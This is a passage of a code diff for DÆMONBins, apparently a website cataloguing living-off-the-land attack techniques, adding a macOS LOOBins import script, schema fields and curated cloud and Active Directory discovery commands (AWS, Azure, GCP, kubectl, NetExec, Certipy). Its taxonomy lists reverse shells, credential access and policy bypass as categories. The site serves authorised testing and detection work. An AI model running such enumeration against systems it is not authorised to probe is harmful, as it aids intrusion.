+ facets.sources = SOURCES.filter(s => techniques.some(t => t.source === s)); + facets.capabilities = CAPABILITIES.filter(c => techniques.some(t => t.capability.includes(c))); + facets.counts = { techniques: techniques.length, tools: tools.size, added: techniques.filter(t => t.added).length, + bySource: count(techniques.map(t => t.source)), byPlatform: count(techniques.flatMap(t => t.platform)), + byCapability: count(techniques.flatMap(t => t.capability)), toolsBySource: count([...tools.values()].map(t => t.source)) }; + facets.commits.loobins = snapshot.commit; + for (const [file, data] of [['techniques', techniques], ['tools', [...tools.values()]], ['facets', facets]]) { + writeFileSync(resolve(root, `src/data/${file}.json`), JSON.stringify(data, null, file === 'facets' ? 2 : 0) + '\n'); + } + console.log(`Enriched ${techniques.length} techniques across ${tools.size} tools (${snapshot.techniques.length} LOOBins, ${additions.length} curated additions).`); +} +if (process.argv[1] && resolve(process.argv[1]) === fileURLToPath(import.meta.url)) enrich(); diff --git a/scripts/import-loobins.mjs b/scripts/import-loobins.mjs @@ -0,0 +1,33 @@ +// Import a checked-out upstream into a committed snapshot. Build/deploy is offline. +import { readFileSync, readdirSync, writeFileSync, mkdirSync } from 'node:fs'; +import { resolve } from 'node:path'; +import { execFileSync } from 'node:child_process'; +import yaml from 'js-yaml'; +import { stableId } from './enrich-data.mjs'; +import { CAPABILITIES } from './technique-schema.mjs'; + +const checkout = process.argv[2]; +if (!checkout) throw new Error('Usage: node scripts/import-loobins.mjs /path/to/LOOBins-checkout'); +const commit = execFileSync('git', ['-C', checkout, 'rev-parse', 'HEAD'], { encoding: 'utf8' }).trim(); +const http = u => typeof u === 'string' && /^https?:\/\/\S+$/.test(u); +const techniques = []; +for (const file of readdirSync(resolve(checkout, 'LOOBins')).filter(f => f.endsWith('.yml')).sort()) { + const bin = yaml.load(readFileSync(resolve(checkout, 'LOOBins', file), 'utf8')); + for (const use of bin.example_use_cases || []) { + if (!use.code?.trim()) continue; + const ref = `https://github.com/infosecB/LOOBins/blob/${commit}/LOOBins/${file}`; + techniques.push({ + id: stableId(`loobins:${bin.name}`, `${use.name}\n${use.code}`), + toolId: `loobins:${bin.name}`, toolName: bin.name, name: use.name.trim(), source: 'LOOBins', + platform: ['macOS'], capability: (use.tactics || []).filter(t => CAPABILITIES.includes(t)), nativeCategory: use.tactics || [], + command: use.code.trim(), description: use.description || bin.full_description, + mitre: [], fullPath: bin.paths || [], environment: ['Local host'], availability: 'Built in', + verification: 'Upstream reference', compatibility: 'Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.', + detection: (bin.detections || []).map(d => ({ type: d.name, value: http(d.url) ? d.url : d.name })), + references: [ref, ...(bin.resources || []).map(r => r.url).filter(http)], + }); + } +} +mkdirSync('src/data/sources', { recursive: true }); +writeFileSync('src/data/sources/loobins.json', JSON.stringify({ repository: 'https://github.com/infosecB/LOOBins', commit, license: 'GPL-3.0', techniques }, null, 2) + '\n'); +console.log(`Imported ${techniques.length} use cases at ${commit}.`); diff --git a/scripts/og.mjs b/scripts/og.mjs @@ -48,24 +48,24 @@ for (const f of readdirSync(FONTS).filter((f) => f.endsWith('.woff2'))) { if (existsSync(ttf) || decompress(join(FONTS, f), ttf)) converted++; } if (!converted) { - console.error('og: could not decompress any WOFF2 → TTF. Install "woff2" (woff2_decompress) or fonttools + brotli.'); - process.exit(1); -} -writeFileSync(join(fcDir, 'fonts.conf'), `<?xml version="1.0"?> + console.warn('og: custom WOFF2 faces unavailable; using the system fallback fonts.'); +} else { + writeFileSync(join(fcDir, 'fonts.conf'), `<?xml version="1.0"?> <!DOCTYPE fontconfig SYSTEM "fonts.dtd"> <fontconfig> <dir>${ttfDir}</dir> <cachedir>${join(fcDir, 'cache')}</cachedir> </fontconfig> `); -process.env.FONTCONFIG_FILE = join(fcDir, 'fonts.conf'); + process.env.FONTCONFIG_FILE = join(fcDir, 'fonts.conf'); +} const sharp = (await import('sharp')).default; // Rosé Pine (night) — the card is always the dark plate, like the code blocks. const P = { base: '#191724', surface: '#1f1d2e', overlay: '#26233a', text: '#e0def4', subtle: '#908caa', muted: '#6e6a86', - love: '#eb6f92', gold: '#f6c177', iris: '#c4a7e7', foam: '#9ccfd8', pine: '#3e8fb0', + love: '#eb6f92', rose: '#ebbcba', gold: '#f6c177', iris: '#c4a7e7', foam: '#9ccfd8', pine: '#3e8fb0', }; // Noto Sans Display is the masthead wordmark face (tokens.css --font-wordmark); // the Archivo subsets do not survive the WOFF2→TTF trip, so the card uses the @@ -77,6 +77,7 @@ const decks = [ { tag: 'GTFOBins', acc: P.foam, n: c.bySource?.GTFOBins }, { tag: 'LOLBAS', acc: P.iris, n: c.bySource?.LOLBAS }, { tag: 'WADComs', acc: P.gold, n: c.bySource?.WADComs }, + { tag: 'LOOBins', acc: P.rose, n: c.bySource?.LOOBins }, { tag: 'DÆMON', acc: P.love, n: c.bySource?.DAEMON }, ]; @@ -110,12 +111,12 @@ const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" widt </g> <text x="80" y="368" fill="${P.subtle}" font-family="${DISPLAY}" font-weight="600" font-size="44" letter-spacing="-1">the Off-the-Land Almanac</text> <text x="1120" y="366" text-anchor="end" fill="${P.text}" font-family="${MONO}" font-size="26" letter-spacing="1">${n(c.techniques)} techniques · ${n(c.tools)} tools</text> - <text x="80" y="420" fill="${P.muted}" font-family="${MONO}" font-size="22" letter-spacing="0.5">GTFOBins × LOLBAS × WADComs — merged, resynced, extended · MITRE ATT&amp;CK mapped</text> - <!-- the four decks --> + <text x="80" y="420" fill="${P.muted}" font-family="${MONO}" font-size="22" letter-spacing="0.5">GTFOBins × LOLBAS × WADComs × LOOBins — merged, resynced, extended · MITRE ATT&amp;CK mapped</text> + <!-- the five collections --> <g font-family="${MONO}"> ${decks.map((d, i) => { - const x = 80 + i * 262; - return `<rect x="${x}" y="470" width="236" height="4" fill="${d.acc}"/> + const x = 55 + i * 220; + return `<rect x="${x}" y="470" width="194" height="4" fill="${d.acc}"/> <text x="${x}" y="522" fill="${P.text}" font-family="${DISPLAY}" font-weight="700" font-size="46" letter-spacing="-2">${n(d.n)}</text> <text x="${x}" y="556" fill="${d.acc}" font-size="20" letter-spacing="3">${d.tag.toUpperCase()}</text>`; }).join('\n ')} diff --git a/scripts/prepare-catalog-sources.mjs b/scripts/prepare-catalog-sources.mjs @@ -0,0 +1,10 @@ +// One-time extraction keeps existing IDs and authored content intact. +import { readFileSync, writeFileSync, existsSync } from 'node:fs'; +import { curatedAdditions } from './curated-additions.mjs'; +const rows = JSON.parse(readFileSync('src/data/techniques.json', 'utf8')); +if (!existsSync('src/data/sources/wadcoms-additions.json')) { + const additions = rows.filter(t => t.source === 'DAEMON' && t.toolId.startsWith('wadcoms:')); + if (additions.length !== 134) throw new Error(`Expected 134 existing additions, found ${additions.length}`); + writeFileSync('src/data/sources/wadcoms-additions.json', JSON.stringify(additions, null, 2) + '\n'); +} +writeFileSync('src/data/catalog-additions.json', JSON.stringify(curatedAdditions, null, 2) + '\n'); diff --git a/scripts/technique-schema.mjs b/scripts/technique-schema.mjs @@ -10,7 +10,7 @@ import { z } from 'zod'; export const PLATFORMS = ['Linux', 'Windows', 'macOS', 'ActiveDirectory']; -export const SOURCES = ['GTFOBins', 'LOLBAS', 'WADComs', 'DAEMON']; +export const SOURCES = ['GTFOBins', 'LOLBAS', 'WADComs', 'LOOBins', 'DAEMON']; export const CAPABILITIES = [ 'Execution', 'Reverse/Bind Shell', 'File Download', 'File Upload', 'File Read', 'File Write', 'File Copy', @@ -48,6 +48,20 @@ export const TechniqueSchema = z.object({ references: z.array(HttpUrl), added: z.boolean().optional(), verifyNote: z.string().optional(), + environment: z.array(z.string()).optional(), + aliases: z.array(z.string()).optional(), + availability: z.string().optional(), + verification: z.enum(['Upstream reference', 'Documentation checked', 'Lab tested']).optional(), + reviewedAt: z.string().optional(), + compatibility: z.string().optional(), + expected: z.string().optional(), + troubleshooting: z.string().optional(), + sideEffects: z.string().optional(), + restore: z.string().optional(), + template: z.object({ + command: z.string(), shell: z.enum(['posix', 'powershell']), + variables: z.array(z.object({ key: z.string().regex(/^[a-z][a-z0-9_]*$/), label: z.string(), default: z.string() })), + }).optional(), }); /** diff --git a/src/components/Footer.astro b/src/components/Footer.astro @@ -16,7 +16,8 @@ const NAV = [ { n: '02', label: 'GTFOBins', href: url('gtfobins'), acc: 'foam' }, { n: '03', label: 'LOLBAS', href: url('lolbas'), acc: 'iris' }, { n: '04', label: 'WADComs', href: url('wadcoms'), acc: 'gold' }, - { n: '05', label: 'Credits', href: url('credits'), acc: 'pine' }, + { n: '05', label: 'LOOBins', href: url('loobins'), acc: 'rose' }, + { n: '06', label: 'Credits', href: url('credits'), acc: 'pine' }, ]; --- <footer class="dfooter site-footer"> @@ -27,7 +28,7 @@ const NAV = [ <div> <a href={url('')} class="dfooter__wordmark">DÆMON<span class="hy">·</span>BINS</a> <p class="dfooter__motto"> - The Off-the-Land Almanac — GTFOBins, LOLBAS and WADComs merged, resynced, and extended. + The Off-the-Land Almanac: GTFOBins, LOLBAS, WADComs and LOOBins, with DÆMON additions. Placeholder-only reference material for authorised testing, CTFs, detection engineering and education. Know your scope; get permission first. </p> @@ -48,7 +49,7 @@ const NAV = [ <span class="dmn-dot" style="--dot: var(--color-night-love);" aria-hidden="true"><i class="dmn-anim-pulse"></i><u class="dmn-anim-ring"></u></span> All systems operational </div> - <div class="row">GTFOBins · LOLBAS · WADComs — each GPL-3.0</div> + <div class="row">GTFOBins · LOLBAS · WADComs · LOOBins · GPL-3.0</div> <div class="row">Rosé Pine · Astro · Pagefind</div> <div class="row">© {year} DÆMONBins · <a href={url('credits')}>credits</a> · GPL-3.0</div> </div> diff --git a/src/components/Header.astro b/src/components/Header.astro @@ -20,7 +20,8 @@ const NAV: { n: string; label: string; href: string; acc: string; exact?: boolea { n: '02', label: 'GTFOBins', href: url('gtfobins'), acc: 'foam' }, { n: '03', label: 'LOLBAS', href: url('lolbas'), acc: 'iris' }, { n: '04', label: 'WADComs', href: url('wadcoms'), acc: 'gold' }, - { n: '05', label: 'Credits', href: url('credits'), acc: 'pine' }, + { n: '05', label: 'LOOBins', href: url('loobins'), acc: 'rose' }, + { n: '06', label: 'Credits', href: url('credits'), acc: 'pine' }, ]; /* Trailing slashes are `ignore`d by the build, so both spellings of a path diff --git a/src/components/HeroDeck.astro b/src/components/HeroDeck.astro @@ -6,7 +6,7 @@ import { url } from '../lib/url'; /** * The home hero — a dark signal-field plate carrying the glitching, decoding - * DÆMONBINS wordmark and an inverse (cream) ledger of the four decks. The + * DÆMONBINS wordmark and an inverse (cream) ledger of the five collections. The * ledger's active deck cycles on a loop and takes over on hover/focus * (scripts/hero.ts); the stat counters roll up from zero on load. The whole * thing is server-rendered and fully legible with JS off — the script only @@ -49,8 +49,8 @@ const WORDMARK = 'DÆMONBINS'; <h1 class="hero-deck__wordmark glitch" data-text={WORDMARK} data-unscramble={WORDMARK}>{WORDMARK}</h1> <p class="hero-deck__tagline">the Off-the-Land Almanac</p> <p class="hero-deck__blurb"> - GTFOBins, LOLBAS and WADComs — merged, resynced, and extended with DÆMON's - fact-checked modern tradecraft. One filterable catalog, mapped to MITRE ATT&amp;CK. + GTFOBins, LOLBAS, WADComs and LOOBins, with DÆMON's command references. + Filter by access, environment and execution context. Configure templates and keep useful commands close. </p> <div class="hero-deck__actions"> @@ -74,7 +74,7 @@ const WORDMARK = 'DÆMONBINS'; <aside class="hero-deck__panel plate-dawn corners" data-hero-panel> <div class="hero-deck__panelhead"> - <span class="hero-deck__paneleyebrow"><span class="mark">^:</span> The four decks</span> + <span class="hero-deck__paneleyebrow"><span class="mark">^:</span> The collections</span> <span class="hero-deck__panellive"> <span class="dmn-dot" style="--dot: var(--pine);"><i class="dmn-anim-pulse"></i><u class="dmn-anim-ring"></u></span> live diff --git a/src/data/catalog-additions.json b/src/data/catalog-additions.json @@ -0,0 +1,720 @@ +[ + { + "id": "daemon:reference:aws-identity", + "toolId": "daemon:aws", + "toolName": "aws", + "name": "Identify the active AWS principal", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "AWS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "aws sts get-caller-identity --profile 'lab'", + "template": { + "command": "aws sts get-caller-identity --profile {{profile}}", + "shell": "posix", + "variables": [ + { + "key": "profile", + "label": "AWS profile", + "default": "lab" + } + ] + }, + "description": "Returns the account ID, ARN and user ID for the credentials selected by this profile.", + "expected": "Returns the account ID, ARN and user ID for the credentials selected by this profile.", + "troubleshooting": "ExpiredToken or InvalidClientTokenId means the selected credentials need refreshing. Check the profile before interpreting identity results.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://docs.aws.amazon.com/cli/latest/reference/sts/get-caller-identity.html" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:aws-config", + "toolId": "daemon:aws", + "toolName": "aws", + "name": "Inspect AWS configuration sources", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "AWS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "aws configure list --profile 'lab'", + "template": { + "command": "aws configure list --profile {{profile}}", + "shell": "posix", + "variables": [ + { + "key": "profile", + "label": "AWS profile", + "default": "lab" + } + ] + }, + "description": "Shows resolved configuration and where each value comes from; credentials are masked.", + "expected": "Shows resolved configuration and where each value comes from; credentials are masked.", + "troubleshooting": "Environment variables can override profile configuration. Check the source column.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://docs.aws.amazon.com/cli/latest/reference/configure/list.html" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:aws-regions", + "toolId": "daemon:aws", + "toolName": "aws", + "name": "List enabled AWS regions", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "AWS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "aws ec2 describe-regions --profile 'lab' --region 'eu-west-2'", + "template": { + "command": "aws ec2 describe-regions --profile {{profile}} --region {{region}}", + "shell": "posix", + "variables": [ + { + "key": "profile", + "label": "AWS profile", + "default": "lab" + }, + { + "key": "region", + "label": "Region", + "default": "eu-west-2" + } + ] + }, + "description": "Returns enabled region names and endpoints.", + "expected": "Returns enabled region names and endpoints.", + "troubleshooting": "Requires ec2:DescribeRegions. A denied request is not evidence that no regions exist.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-regions.html" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:azure-account", + "toolId": "daemon:az", + "toolName": "az", + "name": "Inspect the active Azure subscription", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Azure" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "az account show --output json", + "description": "Shows the active subscription, tenant and account.", + "expected": "Shows the active subscription, tenant and account.", + "troubleshooting": "Run the authorised sign-in workflow if the CLI has no current account.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-show" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:azure-subscriptions", + "toolId": "daemon:az", + "toolName": "az", + "name": "List accessible Azure subscriptions", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Azure" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "az account list --output table", + "description": "Shows subscriptions available to the current account.", + "expected": "Shows subscriptions available to the current account.", + "troubleshooting": "A subscription list does not establish permissions on its resources.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-list" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:gcp-projects", + "toolId": "daemon:gcloud", + "toolName": "gcloud", + "name": "List accessible GCP projects", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "GCP" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "gcloud projects list --format=json", + "description": "Lists visible projects for the active account.", + "expected": "Lists visible projects for the active account.", + "troubleshooting": "Service-account principal-set grants may not appear in this listing.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://cloud.google.com/sdk/gcloud/reference/projects/list" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:gcp-config", + "toolId": "daemon:gcloud", + "toolName": "gcloud", + "name": "Inspect the active gcloud configuration", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "GCP" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "gcloud config list", + "description": "Shows configured account, project and other properties.", + "expected": "Shows configured account, project and other properties.", + "troubleshooting": "Configured properties do not prove that the account has access to the selected project.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://cloud.google.com/sdk/gcloud/reference/config/list" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:gcp-policy", + "toolId": "daemon:gcloud", + "toolName": "gcloud", + "name": "Read a project IAM policy", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "GCP" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "gcloud projects get-iam-policy 'lab-project' --format=json", + "template": { + "command": "gcloud projects get-iam-policy {{project}} --format=json", + "shell": "posix", + "variables": [ + { + "key": "project", + "label": "GCP project", + "default": "lab-project" + } + ] + }, + "description": "Shows policy bindings visible to the current account.", + "expected": "Shows policy bindings visible to the current account.", + "troubleshooting": "Requires resourcemanager.projects.getIamPolicy; inherited grants need separate review.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Authenticated CLI session" + ], + "mitre": [], + "references": [ + "https://cloud.google.com/sdk/gcloud/reference/projects/get-iam-policy" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:kube-context", + "toolId": "daemon:kubectl", + "toolName": "kubectl", + "name": "Check the current Kubernetes context", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Containers" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "kubectl config current-context", + "description": "Prints the selected kubeconfig context without contacting the cluster.", + "expected": "Prints the selected kubeconfig context without contacting the cluster.", + "troubleshooting": "An unset current context must be selected before cluster queries.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Kubeconfig" + ], + "mitre": [], + "references": [ + "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_current-context/" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:kube-contexts", + "toolId": "daemon:kubectl", + "toolName": "kubectl", + "name": "List kubeconfig contexts", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Containers" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "kubectl config get-contexts", + "description": "Shows configured clusters, identities and namespaces.", + "expected": "Shows configured clusters, identities and namespaces.", + "troubleshooting": "This lists local configuration, not proof of cluster connectivity or permission.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Kubeconfig" + ], + "mitre": [], + "references": [ + "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_get-contexts/" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:kube-permissions", + "toolId": "daemon:kubectl", + "toolName": "kubectl", + "name": "Review permissions in a namespace", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Containers" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "kubectl auth can-i --list --namespace 'default'", + "template": { + "command": "kubectl auth can-i --list --namespace {{namespace}}", + "shell": "posix", + "variables": [ + { + "key": "namespace", + "label": "Namespace", + "default": "default" + } + ] + }, + "description": "Returns the server-reported rules for the active identity in this namespace.", + "expected": "Returns the server-reported rules for the active identity in this namespace.", + "troubleshooting": "Some authorizers cannot enumerate every rule. Check a specific verb/resource when the list is incomplete.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Kubeconfig" + ], + "mitre": [], + "references": [ + "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:kube-pod-permission", + "toolId": "daemon:kubectl", + "toolName": "kubectl", + "name": "Check permission to list pods", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Containers" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "kubectl auth can-i list pods --namespace 'default'", + "template": { + "command": "kubectl auth can-i list pods --namespace {{namespace}}", + "shell": "posix", + "variables": [ + { + "key": "namespace", + "label": "Namespace", + "default": "default" + } + ] + }, + "description": "Returns yes or no for this particular action.", + "expected": "Returns yes or no for this particular action.", + "troubleshooting": "The selected context and namespace determine which identity and resources are checked.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [ + "Kubeconfig" + ], + "mitre": [], + "references": [ + "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:nxc-modules", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "List available SMB modules", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Active Directory" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "nxc smb -L", + "description": "Lists modules supported by the installed NetExec version.", + "expected": "Lists modules supported by the installed NetExec version.", + "troubleshooting": "Module names and options vary by release. Inspect module help before using a module.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [], + "mitre": [], + "references": [ + "https://www.netexec.wiki/getting-started/using-modules" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:nxc-module-options", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "Inspect options for an SMB module", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Active Directory" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "nxc smb -M 'spider_plus' --options", + "template": { + "command": "nxc smb -M {{module}} --options", + "shell": "posix", + "variables": [ + { + "key": "module", + "label": "Module", + "default": "spider_plus" + } + ] + }, + "description": "Shows the selected module options.", + "expected": "Shows the selected module options.", + "troubleshooting": "This is module help, not a module run. Use the spelling reported by nxc smb -L.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [], + "mitre": [], + "references": [ + "https://www.netexec.wiki/getting-started/using-modules" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:nxc-help", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "Inspect SMB authentication and connection options", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Active Directory" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "nxc smb --help", + "description": "Shows flags supported by the installed SMB protocol implementation.", + "expected": "Shows flags supported by the installed SMB protocol implementation.", + "troubleshooting": "Use protocol-specific help because supported flags differ by protocol and version.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [], + "mitre": [], + "references": [ + "https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:certipy-find-help", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Inspect certificate discovery options", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Active Directory" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "certipy find -h", + "description": "Shows discovery, output and authentication options for the installed Certipy release.", + "expected": "Shows discovery, output and authentication options for the installed Certipy release.", + "troubleshooting": "Compare your installed release with the wiki before adapting an older example.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [], + "mitre": [], + "references": [ + "https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + }, + { + "id": "daemon:reference:certipy-version-help", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Inspect Certipy commands and version banner", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "macOS" + ], + "environment": [ + "Active Directory" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Configuration and verification" + ], + "command": "certipy -h", + "description": "Shows the installed command set and version banner.", + "expected": "Shows the installed command set and version banner.", + "troubleshooting": "The AD CS conditions behind an ESC label matter as much as CLI syntax; consult the linked official guide.", + "sideEffects": "No intentional configuration changes. Remote reads may generate audit events.", + "compatibility": "Examples use POSIX shell quoting. Consult installed tool help for version-specific options.", + "requires": [], + "mitre": [], + "references": [ + "https://github.com/ly4k/Certipy/wiki" + ], + "availability": "Installed tool", + "verification": "Documentation checked", + "reviewedAt": "2026-10-04", + "added": true + } +] diff --git a/src/data/facets.json b/src/data/facets.json @@ -30,55 +30,59 @@ "GTFOBins", "LOLBAS", "WADComs", + "LOOBins", "DAEMON" ], "counts": { - "techniques": 2885, - "tools": 842, - "added": 179, + "techniques": 3085, + "tools": 907, + "added": 196, "bySource": { "GTFOBins": 2125, "LOLBAS": 481, "WADComs": 100, - "DAEMON": 179 + "DAEMON": 196, + "LOOBins": 183 }, "byPlatform": { - "Linux": 2306, - "macOS": 890, - "Windows": 744, - "ActiveDirectory": 217 + "Linux": 2323, + "Windows": 761, + "ActiveDirectory": 217, + "macOS": 206 }, "byCapability": { "File Read": 768, - "Privilege Escalation": 1448, - "Execution": 1324, + "Privilege Escalation": 1451, + "Execution": 1346, "File Download": 250, "File Upload": 204, "File Write": 437, "Library Load": 82, "Reverse/Bind Shell": 170, "AWL / Policy Bypass": 52, - "Defense Evasion": 70, + "Defense Evasion": 115, "File Copy": 15, - "Credential Access": 88, + "Credential Access": 97, "UAC Bypass": 9, "Compile": 8, - "Discovery": 38, + "Discovery": 134, "Enumeration": 69, - "Persistence": 32, - "Lateral Movement": 18, - "Collection": 18 + "Persistence": 45, + "Lateral Movement": 30, + "Collection": 42 }, "toolsBySource": { "GTFOBins": 458, "LOLBAS": 244, - "DAEMON": 80, - 